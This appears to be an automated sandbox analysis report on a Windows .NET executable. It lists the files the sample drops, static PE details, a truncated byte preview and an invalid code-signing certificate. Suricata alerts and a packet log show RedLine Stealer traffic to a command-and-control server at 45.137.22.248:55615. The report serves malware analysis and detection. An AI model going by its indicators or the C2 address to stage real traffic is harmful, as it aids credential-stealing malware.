                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmpF250.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmpF261.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmpF271.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmpF282.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmpFF2B.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):98304
                                                        Entropy (8bit):0.08235737944063153
                                                        Encrypted:false
                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\VcihjWRO.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):663048
                                                        Entropy (8bit):7.712804788167852
                                                        Encrypted:false
                                                        SSDEEP:12288:Q+KncNPCdkjtqD56vpunMKgabsvmyArpBAz9TjcQ1AQw9xkR:0mPCdkpqF6vpjmsenVBA1jd1AT+
                                                        MD5:68B2A6E71C0C904A9AEABFC9ADBF7A21
                                                        SHA1:0577BCB0A9736B45F1EB92F6070AAC2134E674DC
                                                        SHA-256:F6B09208C3523BE3A490AF2FC305D4574B38D95A435C8A55402FCA38597E6DAC
                                                        SHA-512:077B52BF789DCA81F8155182EAE1FA8CE529586F70A2CB8CE7298917FB6F42C83DCB1CB9274E498295BDDA65D4D2D7DD41EF6EA086DFB510EF75C871FB8DAF46
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 68%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."g..............0.............r.... ........@.. .......................@............@................................. ...O........................6... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................T.......H........E...K......I........W...........................................0..q........(.....(.....r...p.(....(....o.....{.....(....o.....{....r...p.(....(....o.....{.....(....o.....{.....(....o....*....0..L.......(.........( ....o!......,"...t......o"...r-..p(#...,..o"...*(....o$...(%...*V(....o&...o'...o(...*...0..........(.........( ....o!......-.r-..p*...t....o)...*...0..........(.........( ....o!......-.r-..p*...t....o*...*...0..........(.........( ....o!......-.r-..p*...t

                                                        C:\Users\user\AppData\Roaming\VcihjWRO.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.712804788167852
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:I5pvP0CU6M.exe
                                                        File size:663'048 bytes
                                                        MD5:68b2a6e71c0c904a9aeabfc9adbf7a21
                                                        SHA1:0577bcb0a9736b45f1eb92f6070aac2134e674dc
                                                        SHA256:f6b09208c3523be3a490af2fc305d4574b38d95a435c8a55402fca38597e6dac
                                                        SHA512:077b52bf789dca81f8155182eae1fa8ce529586f70a2cb8ce7298917fb6f42c83dcb1cb9274e498295bdda65d4d2d7dd41ef6ea086dfb510ef75c871fb8daf46
                                                        SSDEEP:12288:Q+KncNPCdkjtqD56vpunMKgabsvmyArpBAz9TjcQ1AQw9xkR:0mPCdkpqF6vpjmsenVBA1jd1AT+
                                                        TLSH:B9E4CFD03B36B319CEA55935E259DDBA82F10A68B044BAF719DC3B5735CC260AE0CF46
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."g..............0.............r.... ........@.. .......................@............@................................

                                                        File Icon

                                                        Icon Hash:1bb3b3b3b3d389b3

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x49e972
                                                        Entrypoint Section:.text
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6722EB14 [Thu Oct 31 02:27:32 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Authenticode Signature

                                                        Signature Valid:false
                                                        Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                        Signature Validation Error:The digital signature of the object did not verify
                                                        Error Number:-2146869232
                                                        Not Before, Not After
                                                        • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                                        Subject Chain
                                                        • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                        Version:3
                                                        Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                        Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                        Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                        Serial:7C1118CBBADC95DA3752C46E47A27438

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        push ebx
                                                        add byte ptr [ecx+00h], bh
                                                        jnc 00007F344905B562h
                                                        je 00007F344905B562h
                                                        add byte ptr [ebp+00h], ch
                                                        add byte ptr [ecx+00h], al
                                                        arpl word ptr [eax], ax
                                                        je 00007F344905B562h
                                                        imul eax, dword ptr [eax], 00610076h
                                                        je 00007F344905B562h
                                                        outsd
                                                        add byte ptr [edx+00h], dh
                                                        push eax
                                                        add byte ptr [edi+00h], ch
                                                        imul eax, dword ptr [eax], 006F0073h
                                                        outsb
                                                        add byte ptr [edx+00h], dl
                                                        outsd
                                                        add byte ptr [ebp+00h], dh
                                                        insb
                                                        add byte ptr [ebp+00h], ah
                                                        je 00007F344905B562h
                                                        je 00007F344905B562h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9e9200x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x1988.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x9e8000x3608
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xa20000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x9c9b80x9ca00827723e3f3a266e21bd461075daf2f28False0.8503871957302475data7.711719915976035IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xa00000x19880x1a00f3f359b75bf01dd017d680590fefab17False0.7944711538461539data7.201037097140562IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xa20000xc0x2000ba14ce87197e716b8df5425ca9ea3d6False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0xa01180x151aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8863383931877082
                                                        RT_GROUP_ICON0xa16340x14data0.9
                                                        RT_GROUP_ICON0xa16480x14data1.05
                                                        RT_VERSION0xa165c0x32cdata0.45566502463054187

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-11-04T04:32:04.724301+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.64971845.137.22.24855615TCP
                                                        2024-11-04T04:32:09.774888+01002045000ET MALWARE RedLine Stealer - CheckConnect Response145.137.22.24855615192.168.2.649718TCP
                                                        2024-11-04T04:32:10.039181+01002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.64971845.137.22.24855615TCP
                                                        2024-11-04T04:32:12.999384+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.649763TCP
                                                        2024-11-04T04:32:13.527487+01002045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound145.137.22.24855615192.168.2.649718TCP
                                                        2024-11-04T04:32:13.584322+01002849352ETPRO MALWARE RedLine - SetEnvironment Request1192.168.2.64977745.137.22.24855615TCP
                                                        2024-11-04T04:32:15.174201+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.64978445.137.22.24855615TCP
                                                        2024-11-04T04:32:20.283399+01002045000ET MALWARE RedLine Stealer - CheckConnect Response145.137.22.24855615192.168.2.649784TCP
                                                        2024-11-04T04:32:20.816931+01002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.64978445.137.22.24855615TCP
                                                        2024-11-04T04:32:23.737177+01002045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound145.137.22.24855615192.168.2.649784TCP
                                                        2024-11-04T04:32:24.140389+01002849352ETPRO MALWARE RedLine - SetEnvironment Request1192.168.2.64983745.137.22.24855615TCP
                                                        2024-11-04T04:32:50.939185+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.649984TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 4, 2024 04:32:03.768134117 CET4971855615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:03.773083925 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:03.773179054 CET4971855615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:03.811441898 CET4971855615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:03.816435099 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:04.162556887 CET4971855615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:04.167397976 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:04.621860027 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:04.724301100 CET4971855615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:09.769223928 CET4971855615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:09.769452095 CET4971855615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:09.774888039 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:09.774903059 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:10.039082050 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:10.039099932 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:10.039110899 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:10.039122105 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:10.039135933 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:10.039179087 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:10.039180994 CET4971855615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:10.039192915 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:10.039242983 CET4971855615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:10.171436071 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:10.171452999 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:10.171576023 CET4971855615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.521883965 CET4971855615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.522452116 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.527367115 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.527451038 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.527487040 CET556154971845.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.527569056 CET4971855615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.528331041 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.528633118 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.533236980 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.533314943 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.533442020 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.533452034 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.533488035 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.533488989 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.533499002 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.533514023 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.533525944 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.533535004 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.533560991 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.533565044 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.533576012 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.533586979 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.533620119 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.533688068 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.533730984 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.538100958 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.538157940 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.538259029 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.538305998 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.538310051 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.538316965 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.538346052 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.538366079 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.538383007 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.538393021 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.538497925 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.584186077 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.584321976 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.632211924 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.632302999 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.680249929 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.680361986 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.728189945 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.728255033 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.776259899 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.776312113 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.824287891 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.824347019 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.876219988 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.876280069 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.924189091 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.924246073 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:13.972237110 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:13.972295046 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.020226955 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.020282984 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.068479061 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.068552017 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.116276026 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.119102001 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.135011911 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.135304928 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.135380983 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.140245914 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.140316010 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.140326023 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.140336990 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.140423059 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.140450954 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.140496016 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.140516996 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.140522003 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.140533924 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.140580893 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.140599012 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.140633106 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.140665054 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.140683889 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.140713930 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.140724897 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.140775919 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.140902996 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.140912056 CET556154977745.137.22.248192.168.2.6
